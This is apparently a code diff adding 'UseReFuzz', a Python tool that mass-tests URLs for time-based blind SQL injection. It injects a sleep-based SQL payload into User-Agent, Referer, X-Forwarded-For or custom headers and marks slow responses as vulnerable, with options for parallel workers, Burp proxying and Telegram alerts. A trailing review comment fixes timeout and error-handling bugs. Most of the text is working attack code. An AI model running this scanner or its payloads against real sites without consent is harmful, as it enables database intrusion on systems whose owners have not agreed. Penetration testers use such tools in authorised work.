| 1 | + | #!/usr/bin/env python3 |
| 2 | + | # Author = Tanishq Rathore (Kun) |
| 3 | + | # V = 2.0.0 |
| 4 | + | |
| 5 | + | import requests |
| 6 | + | import argparse |
| 7 | + | import urllib3 |
| 8 | + | import multiprocessing as mp |
| 9 | + | import sys |
| 10 | + | import os |
| 11 | + | import datetime |
| 12 | + | import configparser |
| 13 | + | |
| 14 | + | # Disable warning regarding ssl |
| 15 | + | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
| 16 | + | |
| 17 | + | # Colour Checking |
| 18 | + | if os.name != 'nt': |
| 19 | + | class bcolors: |
| 20 | + | HEADER = '\033[95m' |
| 21 | + | OKBLUE = '\033[94m' |
| 22 | + | OKCYAN = '\033[96m' |
| 23 | + | OKGREEN = '\033[92m' |
| 24 | + | WARNING = '\033[93m' |
| 25 | + | FAIL = '\033[91m' |
| 26 | + | ENDC = '\033[0m' |
| 27 | + | BOLD = '\033[1m' |
| 28 | + | UNDERLINE = '\033[4m' |
| 29 | + | SLANT = '\x1B[3m' |
| 30 | + | else: |
| 31 | + | class bcolors: |
| 32 | + | HEADER = '' |
| 33 | + | OKBLUE = '' |
| 34 | + | OKCYAN = '' |
| 35 | + | OKGREEN = '' |
| 36 | + | WARNING = '' |
| 37 | + | FAIL = '' |
| 38 | + | ENDC = '' |
| 39 | + | BOLD = '' |
| 40 | + | UNDERLINE = '' |
| 41 | + | SLANT = '' |
| 42 | + | print("USEREFUZZ | Colouring is disable as Windows OS is detected") |
| 43 | + | |
| 44 | + | |
| 45 | + | # Banner |
| 46 | + | banner=f""" |
| 47 | + | {bcolors.FAIL} ( ( |
| 48 | + | {bcolors.WARNING} )\ {bcolors.FAIL}) ){bcolors.WARNING}\ ) |
| 49 | + | ( ({bcolors.FAIL} (()/( ( ({bcolors.WARNING}(){bcolors.FAIL}/( {bcolors.WARNING}( |
| 50 | + | )\ ( ){bcolors.FAIL})\ /(_))){bcolors.WARNING})\ /(_)){bcolors.FAIL}))\ ({bcolors.WARNING} ( |
| 51 | + | _ ((_))\ /{bcolors.FAIL}((_|_)) /{bcolors.WARNING}((_|_{bcolors.FAIL}))_/((_{bcolors.WARNING}))\ )\ {bcolors.OKBLUE} |
| 52 | + | | | | ((_|_)) | _ (_)) | |_(_))(((_|(_) |
| 53 | + | | |_| (_-< -_)| / -_)| __| || |_ /_ / |
| 54 | + | \___//__|___||_|_\___||_| \_,_/__/__| {bcolors.SLANT}{bcolors.UNDERLINE}V 2.0.0{bcolors.ENDC} |
| 55 | + | |
| 56 | + | {bcolors.OKBLUE} |
| 57 | + | [ 💉💉💉 {bcolors.ENDC}{bcolors.BOLD} Basic Header SQLI Injection Tester{bcolors.OKBLUE} 💉💉💉 ]{bcolors.ENDC} |
| 58 | + | """ |
| 59 | + | |
| 60 | + | print(banner) |
| 61 | + | |
| 62 | + | # Arguments |
| 63 | + | parser = argparse.ArgumentParser() |
| 64 | + | parser.add_argument('-l','--list', type=str,help=f'📄_List of URL to check for Header SQL Injection \t \t {bcolors.BOLD} {bcolors.OKBLUE}-l urllist.txt{bcolors.ENDC}',default="NO_LIST") |
| 65 | + | parser.add_argument('-p','--proxy', type=str,help=f'✈️ _Burp proxy or any other proxy to send the request \t \t{bcolors.BOLD} {bcolors.OKBLUE} -p http://127.1:8080{bcolors.ENDC}',default="NO_PROXY") |
| 66 | + | parser.add_argument('-m','--message', type=str,help=f'✉️ _Send a message in header for ease of search in Burp history \t \t{bcolors.BOLD} {bcolors.OKBLUE} -m "Just Testing SQLI"{bcolors.ENDC}',default="Testing for SQLI in User-Agent and Referer Header") |
| 67 | + | parser.add_argument('-s','--sleep', type=int,help=f'😴_How much sleep is used in your custom payload \t \t{bcolors.BOLD} {bcolors.OKBLUE} -s 12 {bcolors.ENDC} Default Sleep = 10' , default=10) |
| 68 | + | parser.add_argument('-v','--verbose', help=f'💣_Display All URLs and output \t \t{bcolors.BOLD} {bcolors.OKBLUE} -v {bcolors.ENDC}', action='store_true' , default=False) |
| 69 | + | parser.add_argument('-t','--telify', help=f'💬_Notify on telegram (https://github.com/root-tanishq/telify configuration file required) \t \t{bcolors.BOLD} {bcolors.OKBLUE} -t {bcolors.ENDC}', action='store_true' , default=False) |
| 70 | + | parser.add_argument('-o','--output', type=str,help=f'📁_Save the vulnerable URLs to an output file \t \t{bcolors.BOLD} {bcolors.OKBLUE} -o savefile {bcolors.ENDC}', default="NO_OUTPUT") |
| 71 | + | parser.add_argument('-u','--url', type=str,help=f'🤖_Pass a URL to check for Header SQLI Injections \t \t{bcolors.BOLD} {bcolors.OKBLUE} -u http://domain.tld/index.php {bcolors.ENDC}', default='NO_URL') |
| 72 | + | parser.add_argument('-ch','--customerheader', type=str,help=f'🔒_Custom Header for SQLI Injections \t \t{bcolors.BOLD} {bcolors.OKBLUE} -ch X-Auth {bcolors.ENDC}', default="NO_CUSTOM_HEADER") |
| 73 | + | parser.add_argument('-w','--workers', type=int,help=f'👷_No. of workers (Processes) at a time \t \t{bcolors.BOLD} {bcolors.OKBLUE}-w 10 {bcolors.ENDC}\t \t Default Workers = 5',default=5) |
| 74 | + | parser.add_argument('-i','--inject', type=str,help=f"""💉_Send your custom payload for SQL Injection \t \t{bcolors.BOLD} {bcolors.OKBLUE} -i "'+sleep(10)+'"{bcolors.ENDC} """ , default='"XOR(if(now()=sysdate(),sleep(10),0))XOR"') |
| 75 | + | args = parser.parse_args() |
| 76 | + | |
| 77 | + | if args.telify: |
| 78 | + | try: |
| 79 | + | config = configparser.ConfigParser() |
| 80 | + | config.read(os.path.join(os.path.expanduser( '~' ),'telify.ini')) |
| 81 | + | CHAT_ID = config['TELIFY']['CHATID'] |
| 82 | + | API_TOKEN = config['TELIFY']['APITOKEN'] |
| 83 | + | telifyurl = f'https://api.telegram.org/bot{API_TOKEN}/sendMessage' |
| 84 | + | requests.post(telifyurl, json={'chat_id': CHAT_ID, 'text': f'[💡] (USEREFUZZ) Runned on (⏲️) {datetime.datetime.now()} ⏬'}) |
| 85 | + | except: |
| 86 | + | print(f"😺{bcolors.WARNING}_No Configuration found , setup telify now => {bcolors.ENDC}{bcolors.BOLD} https://github.com/root-tanishq/telify {bcolors.ENDC}") |
| 87 | + | |
| 88 | + | if args.output != "NO_OUTPUT": |
| 89 | + | print(f'{bcolors.BOLD} 📂 Logging Output of Vulnerable URLs to => {args.output}.md \n') |
| 90 | + | file = open(args.output + ".md","w") |
| 91 | + | file.write(f""" |
| 92 | + | # UseReFuzz HEADER SQLI INJECTION REPORT |
| 93 | + | |
| 94 | + | ## Author - Tanishq Rathore (Kun) |
| 95 | + | ## Github - https://github.com/root-tanishq/userefuzz |
| 96 | + | ## Twitter - https://twitter.com/root_tanishq |
| 97 | + | |
| 98 | + | > UseReFuzz runned on `{datetime.datetime.now()}` |
| 99 | + | |
| 100 | + | ## Legality |
| 101 | + | |
| 102 | + | ``` |
| 103 | + | Usage of userefuzz for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program |
| 104 | + | ``` |
| 105 | + | |
| 106 | + | - Payload Used `{args.inject}` |
| 107 | + | |
| 108 | + | - Sleep used for checking `{args.sleep}` |
| 109 | + | |
| 110 | + | # Report Results |
| 111 | + | | TIME TAKEN | URL | IS VULNERABLE | |
| 112 | + | | --- | --- | --- | |
| 113 | + | """) |
| 114 | + | file.close() |
| 115 | + | fileappend = open(args.output + ".md" , "a") |
| 116 | + | |
| 117 | + | def header_injector(url): |
| 118 | + | if args.customerheader != 'NO_CUSTOM_HEADER': |
| 119 | + | header = { args.customerheader : args.inject , 'UseReFuzz':args.message } |
| 120 | + | else: |
| 121 | + | header = {'User-Agent':args.inject , 'Referer': args.inject , 'X-Forwarded-For':args.inject , 'UseReFuzz':args.message } |
| 122 | + | proxy = { 'http': args.proxy , 'https': args.proxy } |
| 123 | + | sess = requests.Session() |
| 124 | + | resp = sess.get(url , headers=header , verify=False) |
| 125 | + | resp_time = resp.elapsed.total_seconds() |
| 126 | + | try: |
| 127 | + | if resp_time >= args.sleep-1: |
| 128 | + | if args.proxy != 'NO_PROXY': |
| 129 | + | try: |
| 130 | + | sess.get(url , headers=header , verify=False , proxies=proxy , timeout=0.000000000001) |
| 131 | + | except: |
| 132 | + | pass |
| 133 | + | print(f'{bcolors.OKGREEN}{bcolors.BOLD}[💉P{bcolors.ENDC}{bcolors.OKGREEN}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.OKGREEN} ] URL => {bcolors.ENDC}', url) |
| 134 | + | else: |
| 135 | + | print(f'{bcolors.OKGREEN}{bcolors.BOLD}[💉💉{bcolors.ENDC}{bcolors.OKGREEN}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.OKGREEN} ] URL => {bcolors.ENDC}', url) |
| 136 | + | if args.output != "NO_OUTPUT": |
| 137 | + | fileappend.write(f'| {resp_time} | "{url}" | 💉True |\n') |
| 138 | + | fileappend.flush() |
| 139 | + | if args.telify: |
| 140 | + | telifyurl = f'https://api.telegram.org/bot{API_TOKEN}/sendMessage' |
| 141 | + | requests.post(telifyurl, json={'chat_id': CHAT_ID, 'text': f'[💎] (USEREFUZZ)⛓️URL(💻)⛓️ {url} ⛓️RESPONSE TIME(⏲️)⛓️ {resp_time}'}) |
| 142 | + | else: |
| 143 | + | if args.verbose: |
| 144 | + | print(f'{bcolors.FAIL}{bcolors.BOLD}[{bcolors.ENDC}NV{bcolors.ENDC}{bcolors.FAIL}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.FAIL} ] URL => {bcolors.ENDC}', url) |
| 145 | + | if args.output != "NO_OUTPUT": |
| 146 | + | fileappend.write(f'| {resp_time} | "{url}" | False |\n') |
| 147 | + | fileappend.flush() |
| 148 | + | except: |
| 149 | + | if args.verbose: |
| 150 | + | print(f'{bcolors.FAIL}{bcolors.BOLD}[{bcolors.ENDC}NV{bcolors.ENDC}{bcolors.FAIL}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.FAIL} ] URL => {bcolors.ENDC}', url) |
| 151 | + | if args.output != "NO_OUTPUT": |
| 152 | + | fileappend.write(f'| {resp_time} | "{url}" | False |\n') |
| 153 | + | fileappend.flush() |
| 154 | + | |
| 155 | + | |
| 156 | + | def main(): |
| 157 | + | if args.url != "NO_URL": |
| 158 | + | header_injector(args.url) |
| 159 | + | elif args.list != "NO_LIST": |
| 160 | + | try: |
| 161 | + | urllist = filter(None , open(args.list,'r').read().split("\n")) |
| 162 | + | with mp.Pool(args.workers) as worker: |
| 163 | + | worker.map(header_injector , urllist) |
| 164 | + | except KeyboardInterrupt: |
| 165 | + | exit(0) |
| 166 | + | except: |
| 167 | + | if os.path.isfile(args.list): |
| 168 | + | exit(0) |
| 169 | + | else: |
| 170 | + | print(f'😥{bcolors.BOLD}{bcolors.FAIL}_We are unable to read the file or the file does not exist{bcolors.ENDC}') |
| 171 | + | elif not sys.stdin.isatty(): |
| 172 | + | try: |
| 173 | + | urlfile = [] |
| 174 | + | for line in sys.stdin: |
| 175 | + | try: |
| 176 | + | urlfile.append(line.split()[0]) |
| 177 | + | except: |
| 178 | + | pass |
| 179 | + | with mp.Pool(args.workers) as worker: |
| 180 | + | worker.map(header_injector , urlfile) |
| 181 | + | except KeyboardInterrupt: |
| 182 | + | exit(0) |
| 183 | + | except: |
| 184 | + | exit(0) |
| 185 | + | else: |
| 186 | + | print(f"😺{bcolors.WARNING}_No Option Provided please check {bcolors.ENDC}{bcolors.BOLD}# {sys.argv[0]} --help {bcolors.ENDC}") |
| 187 | + | if args.output != "NO_OUTPUT": |
| 188 | + | fileappend.close() |
| 189 | + | |
| 190 | + | |
| 191 | + | main() |
| 192 | + | |
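Review bot: The first request in header_injector, `resp = sess.get(url , headers=header , verify=False)`, sits outside the try block and has no timeout, so one unreachable or hanging host either stalls a worker indefinitely or raises through `worker.map`, where main()'s bare `except:` turns it into a silent `exit(0)` and the remaining URLs are never checked. Catch `requests.RequestException` around that call, give it a timeout longer than `args.sleep`, and skip the URL, as sketched below. The bare `except:` clauses also hide a second problem (indentation is lost on this page, so this is read from statement order): when the telify config fails to load, `API_TOKEN` and `CHAT_ID` are never defined while `args.telify` stays true, so the `requests.post` in the positive branch raises NameError after the `💉True` row is written and the handler appends a contradictory `False` row for the same URL; setting `args.telify = False` in the config handler avoids that. Separately, `main()` is called at module level, and under the spawn start method (Windows, which the script explicitly handles) every worker re-imports the module, re-opens the report with `"w"` and calls main() again, so the last line should be `if __name__ == "__main__": main()`.

```python
def header_injector(url):
    # … unchanged: header and proxy construction …
    sess = requests.Session()
    try:
        # Timeout must exceed the expected delay so a slow response is still measured.
        resp = sess.get(url, headers=header, verify=False, timeout=args.sleep + 30)
    except requests.RequestException as err:
        # Report the failure for this URL only; the pool keeps processing the rest.
        if args.verbose:
            print(f'{bcolors.FAIL}{bcolors.BOLD}[ERR]{bcolors.ENDC} {url} ({type(err).__name__})')
        return
    resp_time = resp.elapsed.total_seconds()
    # … unchanged: timing comparison, console output, report rows and telify notification …
```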